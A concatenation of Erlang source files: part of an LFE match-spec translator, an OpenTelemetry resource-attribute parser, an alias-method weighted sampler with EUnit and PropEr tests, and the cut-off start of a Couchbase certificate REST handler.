%%  Expand a head which can only consist of one argument. Only allow
%%  aliasing at the top-level and only to a variable (the variable is
%%  bound to '$_', the whole matched object).
head(Pats, St0) ->
    St1 = St0#ms{where=head}, %We are now in the head
    case Pats of %Test for top-level aliasing
        [['=',S,Pat]] when is_atom(S) ->
            St2 = new_binding(S, '$_', St1),
            head_pattern(Pat, St2);
        [['=',Pat,S]] when is_atom(S) ->
            St2 = new_binding(S, '$_', St1),
            head_pattern(Pat, St2);
        [Pat] -> head_pattern(Pat, St1);
        _ -> throw({error,{match_spec_head,Pats}}) %Wrong size
    end.
%% head_pattern(Pattern, State) -> {Pattern,State}.
%%  Check the head pattern has the right format for the dialect.
head_pattern(Pat, St) -> %Just a variable
    check_head(Pat, St#ms.dialect), %Correct format
    pattern(Pat, St).
%% check_head(Pattern, Dialect) -> ok.
%%  table heads must be tuples (or a variable); trace heads must be
%%  lists (or a variable).  Throws {match_spec_head,Pat} otherwise.
check_head(Pat, _) when is_atom(Pat) -> ok; %Variable
check_head(Pat, table) when is_tuple(Pat) -> ok;
check_head(?Q(Pat), table) when is_tuple(Pat) -> ok;
check_head([tuple|_], table) -> ok;
check_head(['record'|_], table) -> ok;
%% make-record has been deprecated but we sill accept it for now.
check_head(['make-record'|_], table) -> ok;
check_head(?Q(Pat), trace) when is_list(Pat) -> ok;
check_head([list|_], trace) -> ok;
check_head([cons|_], trace) -> ok;
check_head([], trace) -> ok;
check_head(Pat, _Type) ->
    throw({error,{match_spec_head,Pat}}).
%% pattern(Pattern, State) -> {Pattern,State}.
%%  Expand a head pattern, replacing each distinct variable with a
%%  dollar variable ('$N') and remembering the binding.
pattern('_', St) -> {?Q('_'),St};
pattern(Symb, St0) when is_atom(Symb) -> %Variable
    {Dv,St1} = pat_binding(Symb, St0),
    {?Q(Dv),St1};
pattern(?Q(_)=E, St) -> {E,St};
pattern([cons,H0,T0], St0) ->
    {H1,St1} = pattern(H0, St0),
    {T1,St2} = pattern(T0, St1),
    {[cons,H1,T1],St2};
pattern([list|Ps0], St0) ->
    {Ps1,St1} = pat_list(Ps0, St0),
    {[list|Ps1],St1};
pattern([tuple|Ps0], St0) ->
    {Ps1,St1} = pat_list(Ps0, St0),
    {[tuple|Ps1],St1};
pattern(['=',L0,R0], St0) -> %General aliasing
    {L1,St1} = pattern(L0, St0),
    {R1,St2} = pattern(R0, St1),
    {['=',L1,R1],St2};
pattern(['record',R|Fs0], St0) ->
    %% This is in a term but is going to be used as a pattern!
    {Fs1,St1} = pat_rec_fields(Fs0, St0),
    {['record',R|Fs1],St1};
%% make-record has been deprecated but we sill accept it for now.
pattern(['make-record',R|Fs0], St0) ->
    %% This is in a term but is going to be used as a pattern!
    {Fs1,St1} = pat_rec_fields(Fs0, St0),
    {['make-record',R|Fs1],St1};
pattern(['record-index',R,F], St) ->
    {['record-index',R,F],St};
%% Support old no constructor style list forms.
pattern([H0|T0], St0) ->
    {H1,St1} = pattern(H0, St0),
    {T1,St2} = pattern(T0, St1),
    {[H1,T1],St2};
pattern(E, St) -> {E,St}. %Atomic
pat_list(Ps, St) -> mapfoldl(fun pattern/2, St, Ps).
%% pat_rec_fields(Fields, State) -> {Patterns,State}.
%%  Expand the value pattern of each record field; field-name atoms
%%  pass through untouched.
pat_rec_fields([F,P0|Fs0], St0) when is_atom(F) ->
    %% Field names go straight through untouched.
    {P1,St1} = pattern(P0, St0),
    {Fs1,St2} = pat_rec_fields(Fs0, St1),
    {[F,P1|Fs1],St2};
pat_rec_fields([F0,P0|Fs0], St0) ->
    {F1,St1} = pattern(F0, St0),
    {P1,St2} = pattern(P0, St1),
    {Fs1,St3} = pat_rec_fields(Fs0, St2),
    {[F1,P1|Fs1],St3};
pat_rec_fields([], St) -> {[],St}.
%% pat_binding(Var, Status) -> {DVar,Status}.
%%  Get dollar var for variable, creating a new one if neccessary.
%%  Repeated occurrences of the same variable map to the same '$N'.
pat_binding(Var, St0) ->
    case find_binding(Var, St0) of
        {ok,Dv} -> {Dv,St0};
        error ->
            {Dv,St1} = new_dollar(St0),
            {Dv,new_binding(Var, Dv, St1)}
    end.
%% guard(Tests, State) -> {Tests,State}.
%% body(Tests, State) -> {Tests,State}.
%%  The expression translation in the same except for which
%%  expressions/tests are allowed. We use the same functions but carry
%%  a 'where' field in the State to separate them.
guard(Ts, St0) ->
    St1 = St0#ms{where=guard},
    exprs(Ts, St1).
body(Es, St0) ->
    St1 = St0#ms{where=body},
    exprs(Es, St1).
%% exprs(Es, State) -> {Conses,State}.
%% expr(E, State) -> {E,State}.
%%  Expand each expression, building code for a list of the results.
exprs([E0|Es0], St0) ->
    {E1,St1} = expr(E0, St0),
    {Es1,St2} = exprs(Es0, St1),
    {[cons,E1,Es1],St2};
exprs([], St) -> {[],St}.
%% expr(Expr, State) -> {MatchSpecExpr,State}.
%%  Translate an LFE expression into a match-spec guard/body term.
%%  Tuples must be wrapped in {tuple,...} so the ms compiler does not
%%  interpret them as operations.
expr(S, St) when is_atom(S) ->                  %Variable
    case find_binding(S, St) of
        {ok,Dv} -> {?Q(Dv),St};                 %Head variable
        error -> {S,St}                         %Free variable, need binding
    end;
expr(?Q(A)=E, St) when is_atom(A) ->            %Atom
    case atom_to_list(A) of
        [$$|_] -> {[tuple,?Q(const),E],St};     %Catch dollar variables
        _ -> {E,St}
    end;
expr(?Q(T), St) when is_tuple(T) ->             %Must tuple tuples
    {[tuple,T],St};
expr(?Q(_)=E, St) -> {E,St};                    %No need for {const,E}?
expr([cons,H0,T0], St0) ->
    {H1,St1} = expr(H0, St0),
    {T1,St2} = expr(T0, St1),
    {[cons,H1,T1],St2};
expr([list|Es0], St0) ->
    {Es1,St1} = expr_list(Es0, St0),
    {[list|Es1],St1};
expr([tuple|Es0], St0) ->                       %Must tuple tuples
    {Es1,St1} = expr_list(Es0, St0),
    {[tuple,[tuple|Es1]],St1};                  %Yes this is what it is
expr([binary|Segs0], St0) ->
    {Segs1,St1} = expr_bitsegs(Segs0, St0),
    {[binary|Segs1],St1};
%% Record special forms.
expr(['record',Name|Fs], St0) ->
    %% This is in a term and is going to be used as an expression!
    {Efs,St1} = expr_rec_fields(Fs, St0),
    {[tuple,['record',Name|Efs]],St1};          %Must tuple tuples
%% make-record has been deprecated but we still accept it for now.
expr(['make-record',Name|Fs], St0) ->
    %% This is in a term and is going to be used as an expression!
    {Efs,St1} = expr_rec_fields(Fs, St0),
    {[tuple,['make-record',Name|Efs]],St1};     %Must tuple tuples
expr(['is-record',E,Name], St0) ->
    {Ee,St1} = expr(E, St0),
    {[tuple,['is-record',Ee,Name]],St1};
expr(['record-index',Name,F], St) ->
    {['record-index',Name,F],St};
expr(['record-field',E,Name,F], St0) ->
    %% We must remove all checks and return simple call to element/2.
    {Ee,St1} = expr(E, St0),
    {[tuple,?Q(element),['record-index',Name,F],Ee],St1};
%% {[tuple,['record-field',Ee,Name,F]],St1};
expr(['record-update',E,Name|Fs], St0) ->
    %% We must remove all checks and return simple nested setelement/3 calls.
    {Ee,St1} = expr(E, St0),
    {Efs,St2} = expr_rec_fields(Fs, St1),
    Set = expr_set_record(Efs, Ee, Name),
    {Set,St2};
%% {[tuple,['record-update',Ee,Name|Efs]],St2};
%% Special match spec calls.
expr([bindings], St) -> {?Q('$*'),St};          %Special calls
expr([object], St) -> {?Q('$_'),St};
%% General function calls.
expr([call,?Q(erlang),?Q(Op)|Es0], St0) when is_atom(Op) ->
    %% Explicit (call 'erlang 'Op ...) is only allowed for the fixed
    %% set of functions legal in a match spec.
    Ar = length(Es0),
    case is_ms_erlang_func(Op, Ar, St0#ms.where) of
        true ->
            {Es1,St1} = expr_list(Es0, St0),
            {[tuple,?Q(Op)|Es1],St1};
        false -> illegal_func_error({erlang,Op,Ar})
    end;
expr([call,M,F|As], _St) ->
    %% Calls to any other module are never legal in a match spec.
    illegal_func_error({M,F,length(As)});
expr([Op|Es0], St0) when is_atom(Op) ->
    Ar = length(Es0),
    case is_ms_func(Op, Ar, St0#ms.where) of    %Need to know where we are!
        true ->
            {Es1,St1} = expr_list(Es0, St0),
            {[tuple,?Q(Op)|Es1],St1};
        false -> illegal_func_error({Op,Ar})
    end;
expr([_|_], _) -> throw({error,illegal_ms_call});
expr([], St) -> {[],St};
expr(T, St) when is_tuple(T) ->                 %Must tuple tuples
    {[tuple,T],St};
expr(E, St) -> {E,St}.                          %Atomic
%% expr_list(Exprs, State) -> {Exprs,State}.
expr_list(Es, St) -> mapfoldl(fun expr/2, St, Es).

%% expr_bitsegs(Segs, State) -> {Segs,State}.
expr_bitsegs(Ss, St) -> mapfoldl(fun expr_bitseg/2, St, Ss).

%% expr_bitseg(Seg, State) -> {Seg,State}.
%%  A segment that is a literal string (list of integers) is kept
%%  verbatim; otherwise its value and any size spec are translated.
expr_bitseg([Val0|Specs0]=F, St0) ->
    case is_integer_list(F) of
        true -> {F,St0};
        false ->
            {Specs1,St1} = expr_bitspecs(Specs0, St0),
            case is_integer_list(Val0) of
                true -> {[Val0|Specs1],St1};
                false ->
                    {Val1,St2} = expr(Val0, St1),
                    {[Val1|Specs1],St2}
            end
    end;
expr_bitseg(Val, St) ->
    expr(Val, St).

%% expr_bitspecs(Specs, State) -> {Specs,State}.
%%  Only the size expression of a bit spec needs translating.
expr_bitspecs(Specs, St) ->
    mapfoldl(fun ([size,Sz0], S0) ->
                     {Sz1,S1} = expr(Sz0, S0),
                     {[size,Sz1],S1};
                 (Sp, S) -> {Sp,S}
             end, St, Specs).

%% expr_rec_fields(Fields, State) -> {Patterns,State}.
expr_rec_fields([F,V0|Fs0], St0) when is_atom(F) ->
    %% Field names go straight through untouched.
    {V1,St1} = expr(V0, St0),
    {Fs1,St2} = expr_rec_fields(Fs0, St1),
    {[F,V1|Fs1],St2};
expr_rec_fields([F0,V0|Fs0], St0) ->
    {F1,St1} = expr(F0, St0),
    {V1,St2} = expr(V0, St1),
    {Fs1,St3} = expr_rec_fields(Fs0, St2),
    {[F1,V1|Fs1],St3};
expr_rec_fields([], St) -> {[],St}.
%% expr_set_record(Fields, Expr, Record) -> SetRec.
%%  Fold record-update fields into nested setelement/3 calls, innermost
%%  call first, accumulating over the record expression.
expr_set_record([Field,Value|Rest], Acc, RecName) ->
    Acc1 = [tuple,?Q(setelement),['record-index',RecName,Field],Acc,Value],
    expr_set_record(Rest, Acc1, RecName);
expr_set_record([], Acc, _RecName) -> Acc.
%% is_integer_list(Term) -> bool().
%%  True when Term is a proper list containing only integers (i.e. a
%%  "string" in the classic Erlang sense). Any other term, including
%%  improper lists, yields false.
is_integer_list([Head|Tail]) when is_integer(Head) -> is_integer_list(Tail);
is_integer_list([]) -> true;
is_integer_list(_Other) -> false.
%% illegal_func_error(Func) -> no_return().
%%  Abort translation with a non-local throw naming the offending
%%  function (an {M,F,A}, {F,A} or similar tag built by the caller).
illegal_func_error(Func) ->
    throw({error,{illegal_ms_func,Func}}).
%% We are very explicit in what operators and functions are allowed.

%% is_ms_test(Name, Arity) -> bool().
%%  Type tests legal in a match spec, plus is_record/2,3 and the
%%  trace-only is_seq_trace/0.
is_ms_test(Name, Arity) ->
    lists:member({Name, Arity},
                 [{is_atom,1}, {is_float,1}, {is_integer,1}, {is_list,1},
                  {is_number,1}, {is_pid,1}, {is_port,1}, {is_reference,1},
                  {is_tuple,1}, {is_map,1}, {is_binary,1}, {is_function,1},
                  {is_record,2},
                  {is_record,3},                %We get this one directly
                  {is_seq_trace,0}]).
%% is_erl_guard(Name, Arity) -> bool().
%%  Erlang guard BIFs that are legal in a match spec.
is_erl_guard(Name, Arity) ->
    lists:member({Name, Arity},
                 [{abs,1}, {element,2}, {hd,1}, {length,1},
                  {node,0}, {node,1}, {round,1}, {size,1},
                  {map_size,1}, {tl,1}, {trunc,1}, {self,0},
                  {float,1}]).
%% is_ms_guard(Name, Arity) -> bool().
%%  Guard functions legal in a match spec: the Erlang guard BIFs plus
%%  the trace pseudo function get_tcw/0.
is_ms_guard(get_tcw, 0) -> true;                %MS pseudo guard function
is_ms_guard(N, A) -> is_erl_guard(N, A).

%% is_ms_action(Name, Arity) -> bool().
%%  Trace action functions, only meaningful in a match-spec body.
is_ms_action(caller, 0) -> true;
is_ms_action(disable_trace, 1) -> true;
is_ms_action(disable_trace, 2) -> true;
is_ms_action(display, 1) -> true;
is_ms_action(enable_trace, 1) -> true;
is_ms_action(enable_trace, 2) -> true;
is_ms_action(exception_trace, 0) -> true;
is_ms_action(get_seq_token, 0) -> true;
is_ms_action(process_dump,0) -> true;
is_ms_action(message, 1) -> true;
is_ms_action(return_trace, 0) -> true;
is_ms_action(set_seq_token, 2) -> true;
is_ms_action(set_tcw, 1) -> true;
is_ms_action(silent, 1) -> true;
is_ms_action(trace, 2) -> true;
is_ms_action(trace, 3) -> true;
is_ms_action(_, _) -> false.

%% is_ms_bool(Op, Arity) -> bool().
%%  Boolean operators legal in a match spec.
is_ms_bool('and',2) -> true;
is_ms_bool('or',2) -> true;
is_ms_bool('xor',2) -> true;
is_ms_bool('not',1) -> true;
is_ms_bool('andalso',2) -> true;
is_ms_bool('orelse',2) -> true;
is_ms_bool(_,_) -> false.

%% is_ms_arith(Op, Arity) -> bool().
%%  Arithmetic and bitwise operators legal in a match spec.
is_ms_arith('+',1) -> true;
is_ms_arith('+',2) -> true;
is_ms_arith('-',1) -> true;
is_ms_arith('-',2) -> true;
is_ms_arith('*',2) -> true;
is_ms_arith('/',2) -> true;
is_ms_arith('div',2) -> true;
is_ms_arith('rem',2) -> true;
is_ms_arith('band',2) -> true;
is_ms_arith('bor',2) -> true;
is_ms_arith('bxor',2) -> true;
is_ms_arith('bnot',1) -> true;
is_ms_arith('bsl',2) -> true;
is_ms_arith('bsr',2) -> true;
is_ms_arith(_,_) -> false.

%% is_ms_comp(Op, Arity) -> bool().
%%  Comparison operators legal in a match spec.
is_ms_comp('>',2) -> true;
is_ms_comp('>=',2) -> true;
is_ms_comp('<',2) -> true;
is_ms_comp('=<',2) -> true;
is_ms_comp('==',2) -> true;
is_ms_comp('=:=',2) -> true;
is_ms_comp('/=',2) -> true;
is_ms_comp('=/=',2) -> true;
is_ms_comp(_,_) -> false.

%% is_ms_op(Op, Arity) -> bool().
%%  Any operator (boolean, arithmetic or comparison) legal in a match spec.
is_ms_op(Op, Ar) ->
    is_ms_bool(Op, Ar) orelse is_ms_arith(Op, Ar) orelse is_ms_comp(Op, Ar).

%% is_ms_erlang_func(Name, Arity, Where) -> bool().
%%  Functions that may be called explicitly as (call 'erlang ...).
%%  NOTE(review): Where is currently ignored, so actions are excluded
%%  regardless of guard/body context — confirm this is intentional.
is_ms_erlang_func(N, A, _) ->
    is_erl_guard(N, A) orelse is_ms_test(N, A) orelse is_ms_bool(N, A) orelse
        is_ms_arith(N, A) orelse is_ms_comp(N, A).

%% is_ms_func(Name, Arity, Where) -> bool().
%%  Test if Name/Arity is legal function in Where (guard/body).
is_ms_func(N, A, body) ->
    is_ms_action(N, A) orelse is_ms_guard(N, A) orelse is_ms_test(N, A) orelse
        is_ms_op(N, A);
is_ms_func(N, A, guard) ->
    is_ms_guard(N, A) orelse is_ms_test(N, A) orelse is_ms_op(N, A).
%% new_binding(Name, Value, State) -> State.
%% find_binding(Name, State) -> {ok,Value} | error.
%% fetch_binding(Name, State) -> Value.
%%  Variable-name -> dollar-variable bindings, kept as an orddict in
%%  the translation state.
new_binding(Var, Val, #ms{bs=Bs}=St) ->
    St#ms{bs=orddict:store(Var, Val, Bs)}.

find_binding(Var, #ms{bs=Bs}) ->
    orddict:find(Var, Bs).

%% fetch_binding(Var, #ms{bs=Bs}) ->
%%     orddict:fetch(Var, Bs).
%% new_dollar(State) -> {DollarVar,State}.
%%  Produce the next fresh match-spec dollar variable ('$0', '$1', ...)
%%  and bump the counter in the state.
new_dollar(#ms{dc=Count}=St) ->
    {list_to_atom("$" ++ integer_to_list(Count)),St#ms{dc=Count+1}}.
%%%------------------------------------------------------------------------
%% Copyright 2020, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc Adds attributes to the `Resource' based on the value of `resource'
%% in the `opentelemetry' application's environment.
%%
%% [{service, #{name => "service-name",
%%              namespace => "service-namespace"}}]
%%
%% Results in the `Resource' attributes `service.name' and `service.namespace'.
%% @end
%%%-----------------------------------------------------------------------
-module(ot_resource_app_env).
-export([get_resource/0,
parse/1]).
%% @doc Build the resource from the `resource' key of the
%% `opentelemetry' application environment (defaults to an empty map).
get_resource() ->
    Attributes = parse(application:get_env(opentelemetry, resource, #{})),
    ot_resource:create(Attributes).

%% @doc Flatten a (possibly nested) map or keyword list of attributes
%% into a flat list of {"dotted.key", Value} pairs. Anything that is
%% not a map or list is ignored and yields [].
parse(Attributes) when is_map(Attributes) ->
    parse(maps:to_list(Attributes));
parse(Attributes) when is_list(Attributes) ->
    lists:flatmap(fun({Key, Values}) when is_list(Key) ; is_binary(Key) ; is_atom(Key) ->
                          parse_values(to_string(Key), Values);
                     (_) ->
                          %% ignore anything else
                          []
                  end, Attributes);
parse(_) ->
    %% must be a map or list. ignore and return empty if it isn't
    [].

%% parse_values(KeyPrefix, Values) -> [{DottedKey, Value}].
%%  Recursively descend into nested maps/keyword lists, joining key
%%  segments with "." to form the flattened attribute name.
parse_values(Key, Values) when is_map(Values) ->
    parse_values(Key, maps:to_list(Values));
parse_values(Key, Values) when is_list(Values) ->
    lists:flatmap(fun({SubKey, Value=[{_,_}|_]}) ->
                          %% list of tuples means we have more subkeys
                          parse_values([Key, ".", to_string(SubKey)], Value);
                     ({SubKey, Value}) when is_map(Value) ->
                          %% map value means we have more subkeys
                          parse_values([Key, ".", to_string(SubKey)], Value);
                     ({SubKey, Value})->
                          [{unicode:characters_to_list([Key, ".", to_string(SubKey)]), Value}]
                  end, Values);
parse_values(Key, Value) ->
    %% Scalar leaf value: the accumulated key names it directly.
    [{unicode:characters_to_list(Key), Value}].
%% Coerce an atom, binary or list key into a plain list (string);
%% lists are returned unchanged.
-spec to_string(atom() | binary() | list()) -> list().
to_string(Key) when is_atom(Key) -> atom_to_list(Key);
to_string(Key) when is_binary(Key) -> binary_to_list(Key);
to_string(Key) -> Key.
%% Implement weighted sampling with replacement using the alias method.
%%
%% Sources:
%% 1) http://en.wikipedia.org/wiki/Alias_method
%% 2) http://www.keithschwarz.com/darts-dice-coins/
%% 3) https://hips.seas.harvard.edu/blog/2013/03/03/the-alias-method-efficient-sampling-with-many-discrete-outcomes/
%%
-module(sampler_alias).
-behaviour(gen_server).
%% gen_server callbacks
-export([init/1, handle_call/3, handle_cast/2, handle_info/2,
terminate/2, code_change/3]).
%% API
-export([start_link/1, stop/1]).
-export([get_weight/2, set_weight/3]).
-export([to_proplist/1]).
-export([draw/1]).
-ifdef(TEST).
-include_lib("proper/include/proper.hrl").
-include_lib("eunit/include/eunit.hrl").
-endif.
-record(alias, {
len :: non_neg_integer(),
keys :: array:array(),
weights :: orddict:orddict(),
alias :: array:array(),
probs :: array:array()
}).
-type alias_vectors() :: #alias{}.
-type weight() :: {atom() , non_neg_integer()}.
%% API
%% Start a sampler process seeded from the current wall-clock time.
-spec start_link([weight()]) -> {ok, pid()}.
start_link(WeightedList) ->
    start_link(WeightedList, os:timestamp()).

%% @private
%% Internal utility to explicitly seed the random number generator.
-spec start_link([weight()], erlang:timestamp()) -> {ok, pid()}.
start_link(WeightedList, Seed) ->
    gen_server:start_link(?MODULE, [WeightedList, Seed], []).

%% Synchronously stop the sampler process.
-spec stop(pid()) -> ok.
stop(Pid) when is_pid(Pid) ->
    gen_server:call(Pid, stop).

%% Fetch the configured weight for Key (crashes if Key is unknown).
-spec get_weight(any(), pid()) -> non_neg_integer() | {error, term()}.
get_weight(Key, Pid) ->
    gen_server:call(Pid, {get_weight, Key}).

%% Set (or add) the weight for Key; the alias tables are rebuilt.
-spec set_weight(any(), non_neg_integer(), pid()) -> ok | {error, term()}.
set_weight(Key, Weight, Pid) when Weight >= 0 ->
    gen_server:call(Pid, {set_weight, Key, Weight}).

%% Return all configured {Key, Weight} pairs.
-spec to_proplist(pid()) -> [weight()] | {error, term()}.
to_proplist(Pid) ->
    gen_server:call(Pid, to_proplist).

%% Draw one key at random according to the configured weights.
-spec draw(pid()) -> atom() | {error, term()}.
draw(Pid) ->
    gen_server:call(Pid, draw).
%% gen_server callbacks

%% Seed the per-process random state and build the alias vectors.
%% NOTE(review): the 'random' module is deprecated in modern OTP;
%% consider migrating to 'rand' (would change seeding semantics).
init([WeightedList, Seed]) ->
    _ = random:seed(Seed),
    {ok, make_alias(WeightedList)}.

handle_call({get_weight, Weight}, _From, Alias) ->
    {reply, get(weight, Weight, Alias), Alias};
handle_call({set_weight, Key, Weight}, _From, Alias) ->
    %% Rebuilds the full alias structure from the updated weights.
    UpdatedAlias = set(weight, Key, Weight, Alias),
    {reply, ok, UpdatedAlias};
handle_call(draw, _From, Alias) ->
    {reply, select(Alias), Alias};
handle_call(to_proplist, _From, Alias = #alias{weights = Weights}) ->
    {reply, orddict:to_list(Weights), Alias};
handle_call(stop, _From, Alias) ->
    {stop, normal, Alias};
handle_call(_Other, _Form, Alias) ->
    %% Unknown calls are logged and dropped (caller will time out).
    error_logger:warning_msg("received unknown request: ~p", [_Other]),
    {noreply, Alias}.

handle_cast(_Unknown, Alias) ->
    error_logger:warning_msg("received unknown request: ~p", [_Unknown]),
    {noreply, Alias}.

handle_info(_Unknown, Alias) ->
    error_logger:warning_msg("received unknown message: ~p", [_Unknown]),
    {noreply, Alias}.

terminate(_Reason, _Alias) ->
    ok.

code_change(_OldVsn, Alias, _Extra) ->
    {ok, Alias}.
%% Internal

%% make_alias(WeightedList) -> #alias{}.
%%  Build the alias-method tables (Walker's alias method) from a list
%%  of {Key, Weight} pairs. Requires a positive sum of weights.
-spec make_alias([weight()]) -> alias_vectors().
make_alias(WeightedList) ->
    WeightDict = orddict:from_list(WeightedList),
    N = orddict:size(WeightDict),
    SumWeights = orddict:fold(fun (_, V, Acc) -> Acc + V end, 0, WeightDict),
    %% Calculate probabilities & normalise by the average (multiply by N).
    ScaledProbabilties = if SumWeights > 0 ->
                                 orddict:fold(fun (_, V, Acc) ->
                                                      Acc ++ [(V/SumWeights) * N]
                                              end, [], WeightDict);
                            true ->
                                 %% Prevent non positive sums to proceed.
                                 error(badarg)
                         end,
    %% Sort probabilities into larger & smaller than 1/N.
    %% Note we already multiplied by N, therefore compare to > or < 1.
    Sort = fun (P, {Small, Large, Index}) when P < 1 ->
                   {[Index | Small], Large, Index + 1};
               (_P, {Small, Large, Index}) ->
                   {Small, [Index | Large], Index + 1}
           end,
    {Small, Large, _} = lists:foldl(Sort, {[],[],0}, ScaledProbabilties),
    %% Iterate and allocate the large probabilities to the low.
    {Alias, Probabilities} = update_probabilities(Small, Large, array:new(N),
                                                  array:from_list(ScaledProbabilties)),
    #alias{len = N,
           keys = array:from_list(orddict:fetch_keys(WeightDict)),
           weights = WeightDict,
           alias = Alias,
           probs = Probabilities}.
%% get(weight, Key, Alias) -> Weight. Crashes if Key is absent.
get(weight, Key, #alias{weights = Weights}) ->
    orddict:fetch(Key, Weights).

%% set(weight, Key, Weight, Alias) -> Alias'. Rebuilds all tables.
set(weight, Key, Weight, #alias{weights = Weights}) ->
    make_alias(orddict:store(Key, Weight, Weights)).

%% update_probabilities(Small, Large, AliasArr, ProbArr) -> {AliasArr,ProbArr}.
%%  Pair each under-full slot with an over-full one, transferring the
%%  excess probability, until either worklist is exhausted.
update_probabilities([], _Large, A, Pr) ->
    {A, Pr};
update_probabilities(_Small, [], A, Pr) ->
    {A, Pr};
update_probabilities([S | Small], [L | Large], A, Pr) ->
    %% Fill the small
    A1 = array:set(S, L, A),
    %% Calculate replacement probability.
    P = array:get(L, Pr) - (1 - array:get(S, Pr)),
    Pr1 = array:set(L, P, Pr),
    %% L may itself have become under-full; reclassify it.
    {Small1, Large1} = case P < 1 of
                           true -> {[L | Small], Large};
                           false -> {Small, [L | Large]}
                       end,
    update_probabilities(Small1, Large1, A1, Pr1).

%% select(Alias) -> Key.
%%  Alias-method draw: roll a fair die over the slots, then flip a
%%  biased coin to pick the slot's own key or its alias.
-spec select(alias_vectors()) -> any().
select(#alias{len = N, keys = K, alias = A, probs = Pr}) ->
    %% Role the die
    DieRoll = random:uniform(N) - 1,
    %% Now toss the coin
    Random = random:uniform(),
    Index = case Random =< array:get(DieRoll, Pr) of
                true ->
                    DieRoll;
                false ->
                    array:get(DieRoll, A)
            end,
    array:get(Index, K).
-ifdef(TEST).
%% Number of draws per statistical test; large enough for ~2% accuracy.
-define(SAMPLE, 10000).

%% Start a sampler for WeightedList and return the empirically observed
%% probability of each key over ?SAMPLE draws.
create_and_sample_results(WeightedList) ->
    {ok, Sampler} = sampler_alias:start_link(WeightedList),
    draw_n_samples(Sampler, ?SAMPLE).

never_never_occurs_test() ->
    Probabilities = create_and_sample_results([{always, 1}, {never, 0}]),
    %% Ensure never is not set.
    ?assertEqual(false, proplists:is_defined(never, Probabilities)),
    ?assertEqual(1.0, proplists:get_value(always, Probabilities)).

simple_weighted_test() ->
    Probabilities = create_and_sample_results([{twice, 2}, {once, 1}, {never, 0}]),
    %% Ensure never is not set.
    ?assertEqual(false, proplists:is_defined(never, Probabilities)),
    %% Check Twice to be about 66%; multiplying by 10 & trunc reduces
    %% floating point precision.
    Twice = proplists:get_value(twice, Probabilities, 0),
    ?assertEqual(6, trunc(Twice *10)),
    %% Check once
    Once = proplists:get_value(once, Probabilities, 0),
    ?assertEqual(3, trunc(Once * 10)).

equal_distribution_test() ->
    Probabilities = create_and_sample_results([{beer, 1},
                                               {code, 1},
                                               {food, 1},
                                               {sleep, 1}]),
    [?_assertEqual(0.25, P) || {_, P} <- Probabilities].

update_and_find_weight_test() ->
    %% Simple Validation Tests
    Alias = make_alias([{one, 10}, {two, 20}, {three, 30}]),
    ?assertEqual(10, get(weight, one, Alias)),
    ?assertEqual(20, get(weight, two, Alias)),
    ?assertEqual(30, get(weight, three, Alias)),
    Alias1 = set(weight, two, 200, Alias),
    ?assertEqual(10, get(weight, one, Alias1)),
    ?assertEqual(200, get(weight, two, Alias1)),
    ?assertEqual(30, get(weight, three, Alias1)).

run_proper_test_() ->
    { %% Timeout proper after 5 min
      timeout, 360,
      ?_assertEqual([], proper:module(sampler_alias, [{to_file, user}]))
    }.

%% draw n times and fold the results into per-key probabilities.
draw_n_samples(Pid, N) ->
    Samples = [draw(Pid) || _ <- lists:seq(1, N)],
    Aggregate = lists:foldl(
                  fun(V, D) -> dict:update_counter(V, 1, D) end,
                  dict:new(),
                  Samples),
    %% Calculate Probabilities
    [{K, V / N} || {K, V} <- dict:to_list(Aggregate)].

%% Start a sampler with an explicit seed and check each observed
%% probability against the expected Weight/SumWeights within 0.02.
draw_and_check(Weights, Seed) ->
    {ok, Sampler} = start_link(Weights, Seed),
    NoDuplicateWeights = orddict:from_list(Weights),
    Probabilities = draw_n_samples(Sampler, ?SAMPLE),
    SumWeights = lists:foldl(fun ({_, W}, Acc) -> W + Acc end,
                             0, NoDuplicateWeights),
    Test = fun (Key, Probability) ->
                   Pr = proplists:get_value(Key, NoDuplicateWeights) / SumWeights,
                   %% Check accuracy to 0.02
                   abs(Pr - Probability) < 0.02
           end,
    [{K, P, Test(K, P)} || {K, P} <- Probabilities].

%% KLUDGE: Not sure why, by the native timestamp doesn't work in 17.0+.
%% See issue raised at https://github.com/manopapad/proper/issues/94.
-type timestamp() :: {MegaSecs :: non_neg_integer(),
                      Secs :: non_neg_integer(),
                      MicroSecs :: non_neg_integer()}.

prop_sample() ->
    %% Ensure we always have a positive sum of weights.
    ?FORALL({Weights, Seed}, {non_empty(list({atom(), pos_integer()})), timestamp()},
            begin
                Probs = draw_and_check(Weights, Seed),
                Check = fun ({_, _, Test}, Acc) -> Test and Acc end,
                ?WHENFAIL(erlang:display({"Error Probabilities", Probs}),
                          lists:foldl(Check, true, Probs))
            end).

prop_set_weight() ->
    {ok, Pid} = sampler_alias:start_link([{foo, 1}]),
    ?FORALL(Weight, weight(),
            begin
                {Key, Value} = Weight,
                ok = sampler_alias:set_weight(Key, Value, Pid),
                Value =:= sampler_alias:get_weight(Key, Pid)
            end).
-endif.
%% @author Couchbase <<EMAIL>>
%% @copyright 2015 Couchbase, Inc.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc REST api's for handling ssl certificates
-module(menelaus_web_cert).
-include("ns_common.hrl").
-export([handle_cluster_certificate/1,
handle_regenerate_certificate/1,
handle_upload_cluster_ca/1,
handle_reload_node_certificate/1,
handle_get_node_certificate/2]).
%% Dispatch GET /pools/default/certificate: the `extended=true' query
%% parameter selects the JSON form with warnings; otherwise the bare
%% PEM text is returned.
handle_cluster_certificate(Req) ->
    menelaus_web:assert_is_enterprise(),
    case proplists:get_value("extended", Req:parse_qs()) of
        "true" ->
            handle_cluster_certificate_extended(Req);
        _ ->
            handle_cluster_certificate_simple(Req)
    end.

%% Reply with the cluster CA as plain PEM text, whether self-generated
%% or uploaded.
